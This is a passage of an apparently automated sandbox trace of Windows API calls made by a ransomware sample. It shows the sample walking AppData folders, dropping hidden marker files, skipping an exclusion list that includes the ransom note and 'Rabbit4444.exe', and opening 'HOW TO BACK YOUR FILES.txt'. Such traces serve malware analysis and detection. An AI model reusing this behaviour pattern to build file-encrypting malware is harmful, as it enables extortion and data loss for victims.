lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\" [0060.933] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0060.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.936] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.939] FlushFileBuffers (hFile=0x27c) returned 1 [0060.940] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.940] CloseHandle (hObject=0x27c) returned 1 [0060.941] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC") returned 78 [0060.941] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.941] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9929a00a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a6b9b29, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeda418db, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0060.941] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.941] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.941] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.941] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9929a00a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a6b9b29, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeda418db, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.941] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.941] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.941] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.941] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.941] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda418db, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda418db, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271cb8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992c0227, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0060.941] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0060.942] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0060.942] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0060.942] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0060.942] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0060.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0060.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123760 [0060.942] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122368 [0060.942] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271d40c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992c0227, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0060.942] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.942] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.942] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0060.943] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0060.943] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0060.943] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0060.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123820 [0060.943] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122208 [0060.943] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271dcb9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992c0227, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0060.943] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0060.943] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0060.944] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0060.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x124d90 [0060.944] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1220c8 [0060.944] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27be9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992c0227, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0060.944] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0060.944] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0060.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0060.944] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118de8 [0060.944] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122148 [0060.944] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27be9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992c0227, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0060.944] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0060.944] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.944] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.945] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.945] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.945] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.945] CloseHandle (hObject=0x2a0) returned 1 [0060.945] CloseHandle (hObject=0x27c) returned 1 [0060.946] GetCurrentThreadId () returned 0xd98 [0060.946] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0060.946] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp" [0060.946] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0060.946] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0060.946] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp" [0060.946] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\" [0060.946] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0060.946] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.947] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.950] FlushFileBuffers (hFile=0x27c) returned 1 [0060.950] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.950] CloseHandle (hObject=0x27c) returned 1 [0060.951] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp") returned 83 [0060.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.951] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27be9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0060.951] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.951] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.951] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.951] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.951] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27be9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.951] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.951] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.952] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.952] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.952] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.952] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda67bf6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda67bf6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.952] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.952] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.952] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeda67bf6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeda67bf6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.952] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0060.952] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.952] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.952] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.953] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.953] CloseHandle (hObject=0x2a0) returned 1 [0060.953] CloseHandle (hObject=0x27c) returned 1 [0060.953] GetCurrentThreadId () returned 0xd98 [0060.953] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0060.953] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory" [0060.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0060.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory" [0060.953] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\" [0060.953] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0060.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.956] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.958] FlushFileBuffers (hFile=0x27c) returned 1 [0060.959] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.960] CloseHandle (hObject=0x27c) returned 1 [0060.960] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory") returned 90 [0060.960] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.960] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x992c0227, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd271dcb9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeda67bf6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0060.960] 